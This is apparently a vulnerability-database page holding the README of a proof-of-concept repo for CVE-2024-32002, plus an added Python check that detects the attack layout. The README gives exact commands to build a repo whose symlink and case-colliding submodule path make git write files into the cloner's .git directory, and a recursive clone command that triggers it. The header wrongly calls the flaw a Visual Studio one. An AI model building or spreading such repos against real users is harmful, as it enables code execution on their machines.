POC details: 616665ca68d2b6feda4456e06f3851ea5625c5bc

Source
Related vulnerability
Title: Microsoft Visual Studio security vulnerability (CVE-2024-32002)
Description: Microsoft Visual Studio is a suite of development tools from Microsoft (USA); it is a largely complete development toolset covering most of the tools needed across the software lifecycle. For information on this Microsoft Visual Studio security vulnerability, follow CNNVD or the vendor's announcements.
Description
A POC for CVE-2024-32002 demonstrating arbitrary write into the .git directory.
Introduction
# CVE-2024-32002 POC AW
A POC for CVE-2024-32002 demonstrating arbitrary write into the .git directory.

See [cve-2024-32002-submodule-aw](https://github.com/JakobTheDev/cve-2024-32002-submodule-aw) for the related submodule repository.

## What this repo contains
- A symlink with an arbitrary name that links to the `.git` directory.
- A `.gitmodules` file that defines the malicious submodule.

## How to recreate this repo

This repo was created in Linux (WSL2, to be specific). This is important: the malicious repo can only be created on a case-sensitive filesystem.

1. Create a symlink, using all lowercase characters

```bash
ln -s .git submodule
```

Notes:
- The symlink should point to the `.git` folder, since this is where we want to write files.
- The symlink name (`submodule`) is arbitrary, but should start with a lowercase character.
- This is important because lowercase characters sort earlier than uppercase characters. When the cloning machine gets confused about where to write the submodule files, we want it to choose the symlink and not a normal directory.

2. Add the malicious submodule, noting the case difference on the submodule directory name

```bash
git submodule add --name aw https://github.com/JakobTheDev/cve-2024-32002-submodule-aw.git Submodule/notexists
```

Notes:
- The name of the submodule matters; it will come into play when placing our hook in the submodule.
- The first segment of the submodule's path (`Submodule`) should match the symlink name above, differing only in case.
- There must be at least one other segment to the path, since git will only clone submodules into an empty directory. It will create directories for us though, so we chose `notexists` to demonstrate that.

## How to run the POC

1. Check whether you have a vulnerable version of git. See the [GitHub advisory](https://github.com/git/git/security/advisories/GHSA-8h77-4q3w-gfgv) for affected versions.
```bash
git --version
```
2. Think about whether you knowingly want to run a command that could achieve RCE... This repo is benign, but are you sure?
3. Run the following command:
```bash
git clone --recursive --config core.symlinks=true https://github.com/JakobTheDev/cve-2024-32002-poc-aw.git
```
4. Take a look in the `.git` directory. See anything out of place? Hint: what files are in the [submodule](https://github.com/JakobTheDev/cve-2024-32002-submodule-aw)?
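A defender-side check, added here and not part of this repo or the linked advisory: before running `git submodule update` on a freshly cloned (non-recursive) checkout, scan it for the layout this README builds, that is a top-level symlink into `.git` whose name collides case-insensitively with the first path segment of a submodule declared in `.gitmodules`. `demo()` rebuilds this repo's tree in a temp dir with constructed content; the `.gitmodules` URL in it is a placeholder.

```python
import os
import re
import tempfile
from pathlib import Path

SECTION_RE = re.compile(r'^\s*\[submodule\s+"(?P<name>[^"]+)"\]\s*$')
PATH_RE = re.compile(r'^\s*path\s*=\s*(?P<path>\S.*?)\s*$')


def submodule_paths(gitmodules_text):
    """Return {name: path} from .gitmodules (configparser would treat git's
    tab-indented keys as continuation lines, so parse by hand)."""
    paths, name = {}, None
    for line in gitmodules_text.splitlines():
        section = SECTION_RE.match(line)
        if section:
            name = section.group("name")
            continue
        key = PATH_RE.match(line)
        if key and name is not None:
            paths[name] = key.group("path")
    return paths


def find_symlink_collisions(repo):
    """List (submodule name, path, symlink name, target) for each submodule path
    whose first segment equals a top-level symlink into .git only up to case."""
    gitmodules = Path(repo, ".gitmodules")
    paths = submodule_paths(gitmodules.read_text()) if gitmodules.is_file() else {}
    links = {}
    for entry in os.listdir(repo):
        full = os.path.join(repo, entry)
        if os.path.islink(full):
            target = os.path.normpath(os.readlink(full))  # "./.git", ".git/" -> ".git"
            if target == ".git" or target.startswith(".git" + os.sep):
                links[entry] = target
    findings = []
    for name, path in paths.items():
        first = path.split("/")[0]
        for link, target in links.items():
            if link != first and link.lower() == first.lower():
                findings.append((name, path, link, target))
    return findings


def demo():  # constructed copy of this repo's layout, built in a temp dir
    repo = tempfile.mkdtemp()
    os.mkdir(os.path.join(repo, ".git"))
    os.symlink(".git", os.path.join(repo, "submodule"))
    os.makedirs(os.path.join(repo, "Submodule", "notexists"))
    Path(repo, ".gitmodules").write_text('[submodule "aw"]\n\tpath = Submodule/notexists\n\turl = https://example.invalid/aw.git\n')
    return find_symlink_collisions(repo)
```

A non-empty result means the checkout should not have its submodules initialised until the collision is understood.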

File snapshot

```text
[4.0K] /data/pocs/616665ca68d2b6feda4456e06f3851ea5625c5bc
├── [1.0K] LICENSE
├── [2.3K] README.md
├── [   4] submodule -> .git
└── [4.0K] Submodule
    └── [4.0K] notexists

3 directories, 2 files
```